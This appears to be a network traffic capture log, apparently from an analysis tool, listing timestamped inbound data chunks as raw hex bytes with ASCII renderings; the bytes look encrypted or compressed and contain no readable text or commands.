                                                                  2022-07-15 01:58:20 UTC3714INData Raw: 25 01 b2 ac 0b cb 9c fc 22 da 82 14 5c a5 33 06 79 49 16 ac 8a 11 d4 53 a8 d5 e2 c7 65 41 dd 0e cb 8f 03 34 a9 f4 9a 96 aa 4a 66 9d 9f de 50 a3 6f d5 04 02 48 22 02 b3 b9 f3 80 c2 1c 5f 97 3a 58 3e 9a d3 03 30 29 1a b1 35 f5 03 63 e6 2c 79 6f c9 72 9f f0 c4 76 ea 57 98 4c 67 c4 31 3c ca 0f 3d 3c f2 35 af b4 c3 b7 bc 40 da b5 f7 b2 8a 3b 27 89 04 45 87 3f b0 f6 11 2d 98 06 d6 69 b0 fa 38 0b c3 3e 5b cf f1 27 6f 2c b5 a5 01 61 69 b9 23 c7 d8 dc 9f 31 56 5b 18 f8 5d e8 13 06 6c 0c e2 ce 1d 3e 0a e8 75 8c a6 5b 43 28 9f f0 7c 68 ce c0 7b d5 39 4a b9 0d d0 57 c7 95 ee 52 1a f8 eb ed 2f 66 9c d5 d1 75 c0 01 52 c2 eb b7 14 41 64 b5 a7 90 0e 43 fd ee 42 86 4e 4b ab 95 52 7b d7 06 1a 4a ed 2c 55 14 7e ef 0f ae 9b ca af fd 39 3d 7a f9 1e d3 54 04 67 e8 5c 2f 04 28
                                                                  Data Ascii: %"\3yISeA4JfPoH"_:X>0)5c,yorvWLg1<=<5@;'E?-i8>['o,ai#1V[]l>u[C(|h{9JWR/fuRAdCBNKR{J,U~9=zTg\/(
                                                                  2022-07-15 01:58:20 UTC3730INData Raw: f1 65 3c 10 80 d8 6a f7 bf 99 ac 51 1b 95 cf 71 d1 8c f9 b8 a7 2c 46 1f 54 f2 a8 65 0f f2 1e 2a cd 2e c7 49 f9 1f 3f b3 91 71 15 06 e7 41 97 1c f5 06 fa f9 64 e1 96 0f b8 ab d2 ba 25 52 0a cf 6a 45 b3 63 f5 ec fe 1e 02 2a cd de 33 38 c5 e6 84 10 45 ce 14 e7 26 42 38 0d fa 96 be e0 a3 d4 09 b0 79 27 e5 b3 0b 41 63 d6 f4 af 17 0f 59 bd 6c 88 fe f6 ce 06 cf 9b a1 6e 92 a2 92 c0 d5 b8 49 f9 52 0c 0d d7 a3 ae 1e 67 4c 30 ce a1 ad 47 ad 7d e9 00 48 80 95 9a f0 68 2e 0a 76 92 24 88 e2 73 71 bc 7f 76 be 39 23 87 28 ee 57 5f 47 cb 1d 64 0e c9 98 aa df 71 23 e7 88 76 0b 1e 42 dc 28 1d c2 cf b8 38 6e e6 97 56 8c 71 21 8a 02 64 b6 c8 df b1 4b c5 c3 17 be 3a 6a 56 db 4a 0b b8 eb 08 5d 7d ee f5 6c 04 46 26 60 e4 48 6d 52 0e f7 61 6c 67 d5 00 ac aa d1 98 85 31 24 8f ce
                                                                  Data Ascii: e<jQq,FTe*.I?qAd%RjEc*38E&B8y'AcYlnIRgL0G}Hh.v$sqv9#(W_Gdq#vB(8nVq!dK:jVJ]}lF&`HmRalg1$
                                                                  2022-07-15 01:58:20 UTC3746INData Raw: fe 5e 4a d7 a9 57 c7 2b 8d 31 73 64 dc 31 d8 41 c9 5e 5e 6a a3 6f 28 8d 6c ce 31 a8 c9 5b a9 b6 09 05 fc 5d 45 c7 98 1d 57 6c b6 23 ad 1c f2 60 9b 0a d1 d2 a5 61 4f 65 54 c7 f4 bf 39 c6 71 ed 6f 28 b6 93 65 a2 d1 90 4b 05 7e f0 b2 02 9d 0d ef a1 b0 2c 9b 86 9b 2f 18 8b 8e 5f da ec 60 bc b3 4f b2 13 77 f1 56 e1 48 d3 f8 97 a4 42 00 fb 29 9e 05 ca 53 14 bf 32 50 f2 be df c6 60 e9 f1 64 41 a0 93 24 64 b2 38 c9 59 33 ef 1f 4b a7 55 6c d9 2d 19 56 ad 80 6c 3e 9b 8b 44 50 65 1e 52 41 fc a3 4b f3 76 60 2a 3b 17 2f dc ad 53 19 95 bf 9c b6 40 1b 33 2c 99 79 29 f0 c5 ba 1f ac 94 b9 f4 2e 6d b8 b3 56 af 5c 66 52 ad d1 d7 a1 4c 2a 02 44 6f cd 3c 55 9b 1a 63 13 ff 1f 97 97 c3 43 e8 6f c5 8e 8d 57 29 0e c1 b9 b3 7e 5b bb 0b 99 0b c8 c7 65 f0 ce 7e 50 7c 8a 58 84 92 85
                                                                  Data Ascii: ^JW+1sd1A^^jo(l1[]EWl#`aOeT9qo(eK~,/_`OwVHB)S2P`dA$d8Y3KUl-Vl>DPeRAKv`*;/S@3,y).mV\fRL*Do<UcCoW)~[e~P|X
                                                                  2022-07-15 01:58:20 UTC3762INData Raw: b5 d7 ae 88 be d8 c5 5f 4b 24 f9 91 00 88 0c 85 0c 91 50 82 53 40 0f 4f ff 37 16 29 c3 33 d3 85 95 f7 5a c0 3f 0b f5 4d 75 25 20 36 05 af 31 b5 d7 61 77 77 3a da 07 6d 18 47 1c 8b a5 78 3d 01 a3 43 ac c2 62 61 1e ac ed 99 3e 65 a6 ec 49 ec 26 0d 36 33 34 03 28 c0 b2 54 c4 be a7 24 9f a9 36 fd fa 08 b1 b8 a7 8f bc e1 54 65 6d ce 3a 5b 19 63 45 a2 14 11 2b af 65 f2 66 7a 01 d0 45 4c e4 fc b4 ce 06 9d 9e c3 7d a9 f4 66 0a 65 30 3e 13 68 c6 bf 46 6b ab 0e 53 66 fe 73 75 b4 1e b6 c6 cf f3 db 7b d7 06 9f d4 03 dc 26 f2 87 d4 d3 05 64 f1 00 05 02 8a e3 a5 52 f6 d4 ac 4a a7 12 4d a8 47 f6 ac cf 66 8a 4e cb 52 9a d5 92 65 e7 a5 af 62 55 ac 40 06 de ea ac 62 05 5c a2 d3 33 63 fc d1 a4 10 6c c9 f5 16 5f c6 83 0c 6c ab 93 c5 de 30 b4 21 e9 96 5f 41 19 c0 21 87 ef 2c
                                                                  Data Ascii: _K$PS@O7)3Z?Mu% 61aww:mGx=Cba>eI&634(T$6Tem:[cE+efzEL}fe0>hFkSfsu{&dRJMGfNRebU@b\3cl_l0!_A!,
                                                                  2022-07-15 01:58:20 UTC3778INData Raw: a2 b2 32 72 fb 0b 4f e8 30 c1 33 db 6c 6f 12 72 be 14 22 a8 4a 5d 11 2c 6c de ff 07 69 f9 33 ab 23 b4 05 65 00 c3 10 8b 85 6a f0 68 2b 3a 41 fa f1 cf fc 4b 7d bb 06 71 75 36 cc 92 0a 65 de 00 a0 92 fe d8 14 6d 2f 27 98 7f 76 f7 17 1f 90 af 50 18 97 fc 96 33 ed 7f 15 88 4d 0d 0c 48 c5 03 3f c7 8b 9d 8e 44 74 f8 2a 32 27 55 6c 06 e2 76 b7 12 08 40 67 48 e5 4d ec a7 d9 39 f0 4d 04 71 9e 09 8c fd f2 19 8f 16 24 18 56 17 f8 48 3c 40 08 79 eb e6 1f a6 3e 99 bd 8b 71 49 24 30 39 2d 5d 94 da 9a bc aa 36 bb 6d ba 23 b7 d2 a0 e6 04 6f 95 a2 4d bb 1c 25 e7 33 2e b1 0f 3e d9 37 51 6f ce 18 a9 87 5d e0 ef 23 ba 9f bb ac 93 ac 9b d1 89 1a ce ac cb 28 9d d3 37 fb 50 a4 04 70 a1 6a f0 1a 31 d5 63 57 a7 dc 98 ad a7 6e fa 7c 6f fb 98 bd 2e 4a 44 2e e4 56 1d ea 7f 40 50 95
                                                                  Data Ascii: 2rO03lor"J],li3#ejh+:AK}qu6em/'vP3MH?Dt*2'Ulv@gHM9Mq$VH<@y>qI$09-]6m#oM%3.>7Qo]#(7Ppj1cWn|o.JD.V@P
                                                                  2022-07-15 01:58:20 UTC3794INData Raw: 31 82 a1 07 1c 90 5b 3d 79 9d 64 20 69 5b 27 b7 20 df 4c cc 99 23 97 bc af 2f 97 18 5d bf e6 43 b7 38 aa e6 6c c8 b4 cf 65 51 41 57 97 1a d3 52 49 32 a6 29 64 8c cd a0 0b 35 6c af 92 98 43 4e ef 4c 74 d4 b5 62 c4 13 6a 34 2b 9a bd 00 dd 99 d0 5a e5 e4 b4 d8 67 a9 d1 ee 0a a4 42 2f 85 74 1d f2 92 2a 6b 94 5a e6 6d 79 b8 82 48 08 9c 99 b6 a2 ac 46 92 79 3b a2 03 48 36 7e 03 bb 8b 56 77 c1 f3 19 47 44 2f e3 42 ca c6 7e 77 71 99 e0 3a 42 fd ca 52 11 44 74 5c f8 8f 01 1e 0f de bf 8c fe 5c fc e0 b8 83 fc 8f 37 f7 55 dd 86 20 80 06 70 19 c9 d9 a7 c7 56 ee a7 6c 23 de 91 94 bd b1 0a 18 0c 6d 2d b2 6b ff 7e 40 1a f4 b9 39 6a 58 da e4 22 44 16 7d fa 1a 3c 8c 8d 6f 9e 8b 85 e5 2e 42 62 a6 fa 4a 3e 6d 11 8e f7 7d a5 fc 66 47 52 c0 f7 eb 59 82 82 18 9f 70 e5 4b 6b 92
                                                                  Data Ascii: 1[=yd i[' L#/]C8leQAWRI2)d5lCNLtbj4+ZgB/t*kZmyHFy;H6~VwGD/B~wq:BRDt\\7U pVl#m-k~@9jX"D}<o.BbJ>m}fGRYpKk
                                                                  2022-07-15 01:58:20 UTC3810INData Raw: da 70 14 f3 b7 5d 44 0d cc 28 81 a5 3a dd a6 8e 1e 60 26 6d 83 01 83 79 42 2c f8 20 72 99 3f 53 71 f8 5a 00 a2 17 4d 8a 31 4e e1 75 41 7c 71 2f 29 81 65 c0 04 d0 ab 36 1d f6 42 e6 1a bc a7 9c f6 e5 f0 bf 74 e0 b7 45 c2 38 c3 94 a2 27 0c 0e 4f a4 59 a9 d8 a9 bf 0d 4c 5d 83 14 48 45 05 dd f8 49 2c b3 88 ad 9e fd 32 fb 0f 38 58 c5 66 92 ab 85 26 05 5d 8e 5b 75 16 bd 42 90 3e 5b c8 89 b7 49 ab ee 8a a4 97 33 0b 50 9c 7c e9 ea dd 52 ec f2 44 ba 36 6a e9 29 ea 96 22 78 fd 18 ea c4 f8 d7 f1 75 29 2f 19 7d 94 e1 d3 e1 de 71 0a 6e ec c5 68 0a 5d 70 13 c1 68 f3 89 07 6a 55 66 9d 6a 3a f5 8a 8c 96 a5 65 2e 1f cb 9e bf 9e 08 75 fc 41 44 38 5f 5d e6 40 a8 d2 b4 37 7a 5c c4 0e 34 2e e6 f8 dc f4 26 c1 e2 bd 18 96 7a 0a 4d 65 d5 df 5c 97 47 ea 84 3b 35 f5 3c 22 63 8d b6
                                                                  Data Ascii: p]D(:`&myB, r?SqZM1NuA|q/)e6BtE8'OYL]HEI,28Xf&][uB>[I3P|RD6j)"xu)/}qnh]phjUfj:e.uAD8_]@7z\4.&zMe\G;5<"c
                                                                  2022-07-15 01:58:20 UTC3826INData Raw: 8d fb df fd 56 5c 2f a3 5a de 76 72 ee 5c 08 4a 79 1f 29 d2 62 ef b7 d8 d4 2d 7c 9c ca 88 fa 42 90 02 7d 2e 38 2e f4 95 aa 27 87 b4 7c 15 f7 a5 1e 9f 10 a3 d0 94 94 ff ae 01 59 87 c2 8b c2 a1 9a a8 58 5c 3e 2b 1c 87 16 1e 15 60 a2 8f 4b 7e d2 4a dd a2 8a 89 6d 53 80 12 72 38 c5 39 ba 21 a6 2c 41 82 4f 9f f6 c3 fc 08 07 b6 26 91 60 97 30 bd 94 6b 77 48 d9 95 77 90 88 e1 12 d6 51 60 d4 6b 85 25 0b 7a c8 d9 a5 85 32 27 a0 d8 c2 3b ee 58 86 cd 92 95 eb 5a b7 1a 72 36 82 da 35 1e d5 73 dd 82 c5 ac 38 e0 91 2e ad 4b 5c 22 d4 e7 47 f5 ff 0c cf 98 45 83 3e 2e 7c 15 6e 71 85 fb db 8f f8 59 3d 8e 6e b9 8a 94 76 0a 1f 4a 03 e4 f1 0f e0 8d b5 1b 6c 4d 3f e1 d5 fa a7 b1 0f 24 85 56 3d ef 73 36 06 2a 18 66 45 b2 2e 94 ad 08 3e 43 f5 12 1f 2a a7 5e fc 65 ee b9 d2 74 6a
                                                                  Data Ascii: V\/Zvr\Jy)b-|B}.8.'|YX\>+`K~JmSr89!,AO&`0kwHwQ`k%z2';XZr65s8.K\"GE>.|nqY=nvJlM?$V=s6*fE.>C*^etj
                                                                  2022-07-15 01:58:20 UTC3842INData Raw: 71 da ec 47 ed a8 76 5f de d9 f5 5d f6 01 c9 b2 38 39 88 10 30 2e 6e 18 3b d5 bc 8d 0f 1a de eb e3 8b 1d 1e a3 d4 47 5a b3 c5 2b 57 63 8b 98 ed 99 fa 60 42 d4 28 f7 50 95 b6 41 44 c6 15 90 59 a2 1d da 90 63 68 7e 2d cf d4 87 73 c0 53 f7 98 3b 79 06 d4 df e4 c2 97 43 14 1e a4 83 4e 6c 76 f4 13 fd 7d 44 fc 6f 93 3c 57 3a 39 94 91 06 4b 56 4e a8 13 f9 47 3a 00 4f f6 43 d2 40 ca 5e 5d dc f6 1e d6 42 37 e9 d4 3f c8 c9 36 8c 14 94 f9 55 18 18 ae fd 95 d1 3c 11 bb 7a 40 e2 16 c4 46 ae 09 55 9f af ef 62 c0 47 23 4c 0d 16 77 79 5c ff f4 d1 19 e4 27 03 a6 32 dc 96 ee ba 1f d0 de cc de fc 5e 97 74 85 85 82 09 0f dd df 99 29 27 fc 54 f1 6f ee 70 86 36 04 8d 1d d1 63 5f 14 b3 2c 03 04 17 e9 b0 a1 05 24 93 dc 6f e7 b5 a8 23 75 0f 28 f3 7b 67 44 38 15 90 ba a3 60 ee 93
                                                                  Data Ascii: qGv_]890.n;GZ+Wc`B(PADYch~-sS;yCNlv}Do<W:9KVNG:OC@^]B7?6U<z@FUbG#Lwy\'2^t)'Top6c_,$o#u({gD8`
                                                                  2022-07-15 01:58:20 UTC3858INData Raw: 56 9d 87 50 aa 7b 9c 0c 6c 8b 69 eb 25 dd 55 b5 91 da fd 24 42 60 98 36 88 07 ca 76 dd 51 db 4e e7 75 f5 00 5c 1c ad 2a 74 21 4d 5c ed 4c 15 51 68 4d 6f 2f 58 3a e6 24 dc 89 5e e8 0d 43 5a 78 60 90 9a 57 cc 5e 0e 80 54 8f c2 e0 64 8b 5d ae 91 8e 45 76 15 82 96 b5 bd 53 c7 ff a3 40 16 27 91 54 8a 1f ec 56 fa fc ad db 25 2e b2 71 c1 e5 a3 50 c6 24 b8 97 40 9a d8 14 d2 45 ff 38 31 21 a1 1d bb da a1 71 cd 76 fd ba f6 28 d9 5b 12 09 60 54 83 99 ed 29 4a 34 51 41 7c 3f 00 3d 29 3c a2 36 a2 da 59 c6 dc 89 4f 4f 43 3d 35 b3 e3 99 6a d4 30 77 5f 76 b8 ac 02 d2 f8 96 ea 43 53 43 45 6a dc 23 e9 c1 49 f6 62 4a 0c 3d cc aa 8b c3 3e a8 46 54 16 aa b5 3b fc 5c c4 4d bd 14 c7 ff 78 b4 93 60 05 48 00 77 c5 b5 ff 41 a8 c5 07 c4 9a bf f4 40 21 60 56 53 3a 43 fc aa aa 9d 57
                                                                  Data Ascii: VP{li%U$B`6vQNu\*t!M\LQhMo/X:$^CZx`W^Td]EvS@'TV%.qP$@E81!qv([`T)J4QA|?=)<6YOOC=5j0w_vCSCEj#IbJ=>FT;\Mx`HwA@!`VS:CW
                                                                  2022-07-15 01:58:20 UTC3874INData Raw: 79 3b 3b 23 14 e5 e5 0a 40 95 b9 7d 38 c3 ef fa 67 e6 e4 ce f0 3e f6 74 92 72 08 55 11 73 55 cb 9d 88 c1 81 a5 ac 3b 95 63 8f 4a 8f 40 79 98 59 f5 d0 5a 61 29 49 cf df c1 fd 23 03 75 ae 1c a8 60 ba 8f 79 00 a9 14 19 82 f6 97 cc 84 92 62 2c fd 69 45 85 f2 b0 cd 2a 29 b9 1a 1d 14 56 0d 4f 77 a4 a6 90 6c db 3d 2a 2c 5b 68 a7 71 37 d3 b9 ac 5d 0a 05 0a 82 2a 4b ff c0 39 b2 6b ab 52 e3 9b 2e f4 4b 5f a6 7f 40 d2 8a 27 45 45 00 79 86 cb 0c 40 35 40 e8 29 d9 20 12 b4 31 00 ae f1 1e 6a 5e d4 cb 68 b3 76 27 36 39 65 cf c3 a9 0c 40 a6 82 03 c5 f9 d9 28 8b a0 c8 69 cc 6c 8c bb 4b c1 c3 f9 a6 89 aa 22 b6 cd 4a fa 71 82 80 71 67 9b bd a1 57 fd f5 76 a3 75 9b 01 f4 98 f9 91 17 9c b8 be 5d 18 d8 c7 9f 9c a8 93 bf 7e 39 d6 b9 52 bb 8c 2d dd 80 be 72 72 d4 f5 97 54 e2 87
                                                                  Data Ascii: y;;#@}8g>trUsU;cJ@yYZa)I#u`yb,iE*)VOwl=*,[hq7]*K9kR.K_@'EEy@5@) 1j^hv'69e@(ilK"JqqgWvu]~9R-rrT
                                                                  2022-07-15 01:58:20 UTC3890INData Raw: 7e 2c b1 2f 08 93 a4 e9 e7 a1 31 18 40 7f c1 60 a8 9f af 81 77 56 eb ff d7 b1 f7 4e 05 b0 8b 01 8b bc b2 85 05 9b 98 3b d9 b7 46 fe 63 c8 39 ca be 4b b5 39 c8 78 50 b8 9e 87 fb 6d 89 85 d8 8d 1c fd 8f e7 f9 3a 0c 44 5c 15 17 01 6a 51 7b a0 fa cb b6 c1 08 45 eb e8 eb 74 70 49 5b c3 4b ff c1 00 a2 71 f9 b3 10 31 4c eb d5 25 a2 2e 7f c8 2b b7 d5 c4 5c 9b 21 d7 6b 61 03 99 9f 29 4d f4 71 0b fb 1a c9 ae 72 9b 82 32 f6 03 eb a9 24 cc 97 99 4b e0 5a 16 dd 6e 24 dd 79 f1 d2 3f f4 20 b8 c0 5e 0a 7e 64 c6 cc 46 6e ad 97 d3 38 3a 8c 20 d8 b8 0d fb b4 0c 1e e2 79 ae b1 d5 24 c0 60 e7 c2 4e a2 a6 2c 6f 6e a8 21 da b2 47 71 f2 0e ab da 52 ce 3a 19 41 41 90 04 f1 0f b0 1d a2 cc c6 80 3e 32 81 5c 5a 27 6c 7f 8a 1e af 41 18 cf a3 33 6d 5d 69 2e 15 20 7d e8 ec aa ac 2d ef
                                                                  Data Ascii: ~,/1@`wVN;Fc9K9xPm:D\jQ{EtpI[Kq1L%.+\!ka)Mqr2$KZn$y? ^~dFn8: y$`N,on!GqR:AA>2\Z'lA3m]i. }-
                                                                  2022-07-15 01:58:20 UTC3906INData Raw: 54 99 f5 d7 f7 a2 53 f8 5a af c2 10 69 da f1 71 f6 55 85 c5 b0 e0 89 c0 50 83 57 bf 81 53 de 80 26 21 64 b3 d4 68 bf 97 35 fb ec 5b 2c 7b 61 60 a8 75 e4 a3 5b 75 00 91 81 31 a2 0f 97 9a 8c a5 be cb 50 43 56 30 28 98 df 2c 9b ae 31 d2 c6 c2 6a 41 6a 78 dc 00 64 b6 19 29 dc eb 4d c8 62 93 ca 9e 3e b3 30 59 56 c7 dd f0 2a 28 1d 3d f1 6e 5c 11 74 e3 ac 52 99 58 4f 25 49 74 1e 8c 61 cf 4b 19 90 89 99 43 7d 69 40 9e ce 16 31 ea ef 3e ca 9f b6 d9 9b e6 ed b9 a5 24 d9 fd 9e 1c a3 11 0e fe 07 70 5d 12 ff 61 fd de 7e 44 a0 8e 77 ab 99 cf 95 ac 3f fb 2c ab e8 b3 da bf eb 19 e5 72 7c 33 a1 45 e7 2c 7c 27 e7 e5 3a 34 0c 60 70 78 4b 93 6d 3e 87 f8 e0 b8 24 5c 20 8e 25 ca ca 2b 91 53 2e ae 94 f5 13 39 07 1a a7 86 62 15 a9 ae 13 1b 27 11 aa 6b c5 57 34 56 87 5b 87 54 01
                                                                  Data Ascii: TSZiqUPWS&!dh5[,{a`u[u1PCV0(,1jAjxd)Mb>0YV*(=n\tRXO%ItaKC}i@1>$p]a~Dw?,r|3E,|':4`pxKm>$\ %+S.9b'kW4V[T
                                                                  2022-07-15 01:58:20 UTC3922INData Raw: 56 58 2a f4 d8 26 8e 81 8c 54 5c c9 c2 c6 04 ca d3 ac 84 29 a7 7c 79 b5 8b 7c f3 9d b7 88 6f 05 bf 3d 62 8f ea 23 64 03 e0 44 c2 41 db 09 e6 33 9d 91 45 79 92 38 f9 bb 59 51 34 d9 0d ba 9e 28 b2 c3 cb 7d 0d bf 62 8a 42 c0 b8 31 25 36 e7 ff 3f 7e 69 f8 5e c1 b0 49 83 ee d5 1c 71 96 e9 6a 33 91 de 63 58 2a b0 5b 3e ae 9a 95 a4 79 8f 88 4a 2f 29 53 82 82 94 b8 b0 24 0c 27 bf ff 47 a5 55 0f ef 70 3e 45 27 1b a5 8f d9 eb b7 3a c0 68 60 d2 27 cb 6b da 98 21 e8 1d 1b b9 67 0f 9d 31 84 48 69 19 0b 3c b9 12 11 8a 72 10 a1 1b 03 fd a3 a4 cd b4 fb 45 97 cb 0c d9 f7 f3 e8 25 3c e7 48 e1 78 4e c1 79 11 e8 c4 59 9f c7 b6 70 da ff 64 74 09 7a 1d a2 a0 22 ce 26 5d 27 79 2e 4f b3 06 a2 e8 89 17 10 60 5f 11 1f b9 15 0f 5d 77 89 b6 2e 87 70 92 bd 4c bb 2e 17 0c fc db 08 d0
                                                                  Data Ascii: VX*&T\)|y|o=b#dDA3Ey8YQ4(}bB1%6?~i^Iqj3cX*[>yJ/)S$'GUp>E':h`'k!g1Hi<rE%<HxNyYpdtz"&]'y.O`_]w.pL.
                                                                  2022-07-15 01:58:20 UTC3938INData Raw: 9b 45 6d 38 cd 45 29 4c b4 99 3f 95 a5 7b 46 8f c7 68 be c8 25 99 82 e4 fc 35 fc d9 70 55 86 28 9d 6e aa 15 c3 89 db 17 1c 53 1d 8c 8b 6f e7 b9 f1 cc 1f 12 b8 43 2d 98 95 8b f2 27 c7 3e d1 ae 23 34 2c 3b fa 22 db cf 3d ee 77 23 ad b7 cb 17 88 19 01 f1 ec 74 aa ab f5 49 4e 81 a2 92 da 7d 1a f8 a0 c3 c2 be 4f eb 94 c1 a9 8c 0c e4 c3 67 6d 39 8a 31 e9 54 11 cc 42 fc 65 20 93 fb 3c 5d 99 cb 16 4b 25 5c 98 98 f0 7b 00 4a 1e 15 94 01 2d 38 37 26 e1 2f 3f ae ff 6a 08 be ff a6 35 10 5b 8c 5d df 50 b7 f6 1e d6 f9 98 ae 28 10 1a f2 b0 35 93 c0 5d 69 ab d4 6c 5c 89 1d e3 59 9c 2a 5e 85 77 8e 0f 84 cd 86 c1 19 83 3b 6c 91 39 4f 17 4c 31 7b 56 f9 28 4f e7 ee ac 21 96 84 f1 67 87 53 4d 11 6b 39 5a 62 f3 e5 c4 e4 5b ca 8a be 89 a4 6c dc 70 d5 d8 3e f3 fc fb e3 c6 63 a7
                                                                  Data Ascii: Em8E)L?{Fh%5pU(nSoC-'>#4,;"=w#tIN}Ogm91TBe <]K%\{J-87&/?j5[]P(5]il\Y*^w;l9OL1{V(O!gSMk9Zb[lp>c
                                                                  2022-07-15 01:58:20 UTC3954INData Raw: b5 41 b9 03 18 c4 5d e5 18 99 a5 02 16 e7 72 11 8c 87 45 69 39 f5 a5 d8 96 e3 2d fa 22 30 54 84 f6 82 30 d0 dd 96 c5 6b a3 dc 16 d6 07 d9 33 16 87 c6 ca c2 84 e6 6c 31 6b 1d 56 8c 5a 26 b0 19 47 0f 3b ba 6d 92 86 52 76 e3 ad 20 ca 4a d0 dd bb d1 6a 6b 42 20 96 ab ed 01 9d 24 5a d8 d7 10 78 bf 39 84 eb 56 04 be 83 3f 26 c6 40 ce 83 ef a7 7b d1 39 a8 97 29 d2 af 72 94 56 03 c1 49 72 07 ca 9c 63 e6 c5 56 4c 77 dd fe fa ef 72 c8 de d3 20 4b 13 3b 1e 44 ce 7c 5b d6 e2 da 56 ee 2b ed 87 b2 34 c0 82 8c 70 0e 60 84 55 6d 02 ee 33 70 0b 4b fd 9d 54 6e 3b 6e 24 5a 69 be 0a f6 97 75 4e 45 db 82 c2 fa 7c ec 45 2a e2 db 3b ec 6e 24 35 6d 5f 76 16 10 72 dd b9 2f 82 0b 63 90 02 8b 4b 88 02 b4 44 8a 0b 1e 0c 19 1a fb 56 10 e8 eb 41 64 1f 71 b9 05 6c 1a c9 ff 40 38 fb cf
                                                                  Data Ascii: A]rEi9-"0T0k3l1kVZ&G;mRv JjkB $Zx9V?&@{9)rVIrcVLwr K;D|[V+4p`Um3pKTn;n$ZiuNE|E*;n$5m_vr/cKDVAdql@8
                                                                  2022-07-15 01:58:20 UTC3970INData Raw: 8c bb e4 dc 2a 6f f3 11 11 8f 53 4e 59 38 00 7a aa bf 57 33 67 db eb b8 ba c4 7f c9 6e 75 9c 29 c7 76 c1 56 0e 56 fe e0 08 a9 a3 59 19 c7 6c 36 95 3f 4f 78 25 4a 82 1f 40 1a 59 20 5a 1d 93 b6 10 a1 0f f0 c2 68 68 84 c1 6f 8b 40 f6 41 90 22 09 48 bf b0 8a 52 b8 91 51 73 0c 2f 20 22 50 82 e8 d5 32 83 d9 30 ab 9d 49 b5 80 50 ad 75 74 7d 1c d1 30 9e af 18 4f 20 5e c1 ba 4f 93 66 0b e5 10 a8 e8 cf 4c 03 10 d2 c0 21 68 06 84 bc e2 3c 9d ec d6 4b cc f0 fa bd 8f 75 53 50 cf e1 9e 06 9b 42 46 62 71 5e 94 1f bf 42 35 3a de 57 36 02 ae 57 32 19 f6 14 ae b6 6d 2c 08 ee 43 42 5d 7d 20 3e 16 03 1b c4 ee fc 23 e6 e9 6e e9 28 32 64 77 09 02 9d 5a 96 84 9c 81 e8 cd 10 1e ad 6d 18 a7 ae 07 b4 eb b2 56 fa 3d fa bf 97 88 1f eb 48 82 98 48 19 4f 6f 37 3e e2 88 56 55 47 53 63
                                                                  Data Ascii: *oSNY8zW3gnu)vVVYl6?Ox%J@Y Zhho@A"HRQs/ "P20IPut}0O ^OfL!h<KuSPBFbq^B5:W6W2m,CB]} >#n(2dwZmV=HHOo7>VUGSc
                                                                  2022-07-15 01:58:20 UTC3986INData Raw: bb 81 cc 01 ba d4 aa ab bd dd e5 89 48 20 64 82 a1 8b 97 aa e5 bd 44 d8 e8 25 03 9d f9 bb 9a 9f 8e 1f d8 be 8b 2f 45 c4 b4 c5 93 41 8a 67 f2 eb 47 8b b2 07 b0 4d 72 de 68 ba 3f b9 1a 60 c3 05 f1 04 b0 ba 3a 1e 7b 15 a5 e4 5c d6 85 aa 4e 97 df a9 1a 50 5e f8 81 70 1a 18 7d b2 53 37 f6 be 55 2e f3 65 94 79 df ae 79 00 9d ff 5d 0e b8 f8 60 07 d6 6e 82 44 c1 69 84 66 53 c6 5b 82 68 4c 25 78 30 af 4b a8 29 a0 09 8c 48 df 07 b5 d7 ff 88 82 61 7a 5d 0d 40 18 04 96 e4 52 17 0c c0 43 73 19 0b cc f1 bf 6f 0e 5f 77 61 20 6c 74 5e 9a 32 13 a3 03 03 4f 4f 48 12 e3 66 c7 12 96 91 63 29 28 ae c9 4a a2 01 8c cd 4c 54 f8 f2 72 c8 41 3c 94 7c 85 97 4c 9d 9f bc 73 cf 0b e9 8c ad 32 ef f3 a1 51 3d ab 5c 87 44 ef 4a eb 04 c6 ad 89 1f 80 6a 34 e0 c6 15 83 3e 0f 0d 9c fb b8 4e
                                                                  Data Ascii: H dD%/EAgGMrh?`:{\NP^p}S7U.eyy]`nDifS[hL%x0K)Haz]@RCso_wa lt^2OOHfc)(JLTrA<|Ls2Q=\DJj4>N
                                                                  2022-07-15 01:58:20 UTC4002INData Raw: 9a bf 1f bc 44 25 a7 8f b4 95 9b 51 3d 72 c8 f0 37 fe 2b 86 7e fc c1 14 a0 c9 0c db fe f5 1d 1a fc cd 8e f8 e3 ad 09 1b ba 64 8b a0 f0 26 fa 63 06 c2 05 e0 2d 74 e8 5d f1 4e 1b 08 7c 1f f1 02 5a ef cf f6 3e b8 d5 3d eb 0b 51 50 ac 1c 3f d1 1b 4d 4a 78 41 a6 dc 59 34 fc 5d b9 ab a2 2a 36 74 93 f2 29 af 75 74 27 ca db e4 df 8f 0a 00 cf fc d5 f5 8d f4 de 76 99 b6 cc cc 7f 11 62 90 72 e1 e3 58 41 35 ae 93 dd c9 b3 12 26 11 2b d5 71 c0 84 d4 d5 db f4 e8 e0 9c 37 22 82 12 cb 00 80 ae 8e ba 23 2c 5f 62 87 39 50 c0 03 6c 0b 14 e7 a7 9f 3a de e9 ed 68 83 bb 44 d5 ce 60 74 c2 2b 80 0a dc 0c d8 24 f8 f4 a6 b2 ed 65 da 15 8f 60 6e aa d3 b7 eb 9a 25 a5 7c dd d5 8d 94 3d 1d 69 ad 1d f8 e6 82 e1 21 30 80 04 cf 9e 44 89 de ec 98 bb fd 37 c2 40 9b 9a 2b 8d 05 ca 3e c3 f5
                                                                  Data Ascii: D%Q=r7+~d&c-t]N|Z>=QP?MJxAY4]*6t)ut'vbrXA5&+q7"#,_b9Pl:hD`t+$e`n%|=i!0D7@+>
                                                                  2022-07-15 01:58:20 UTC4018INData Raw: 47 55 97 7d 85 f9 eb c3 b2 6d 10 62 f0 81 62 3a a6 6a 15 8f 85 02 08 70 90 32 a8 50 ec 11 6e 47 47 b1 2d 72 5a 3b 63 cc 99 ce 52 6e 32 8c e3 67 85 ac e0 ad d5 c2 c4 22 f7 f2 15 73 e9 7e e7 db d3 3c fd 08 66 8f fc 49 fd a2 ee ae 36 55 8a 5c bc c4 94 69 33 52 20 99 b3 ff 33 9b d6 33 5a ce 86 6e 6d a1 82 c9 53 dc 80 ac 06 ec e6 06 51 e2 32 f0 b0 b5 88 03 1e 8b cc f0 4d 1b 8a ce ec 1c 82 70 f3 c4 b7 04 3a 62 23 06 d7 65 8a 6d 95 ae de 20 16 b7 90 23 bb 91 ee 55 ac f8 6b 7d 30 c2 ea 57 32 08 46 57 53 a0 08 35 0c 2e 40 7c 6e 6d f6 1d 92 d3 4a 46 aa 04 fa 31 d1 9c a4 01 53 65 54 d3 90 f8 c4 82 91 d3 55 f5 9e f2 3e ca d3 ac 5d 80 